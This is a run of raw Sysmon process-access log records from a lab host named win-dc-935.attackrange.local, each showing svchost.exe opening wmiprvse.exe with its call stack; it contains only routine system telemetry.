13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.789{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.649{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.649{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.649{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.618{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.602{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.602{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.602{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 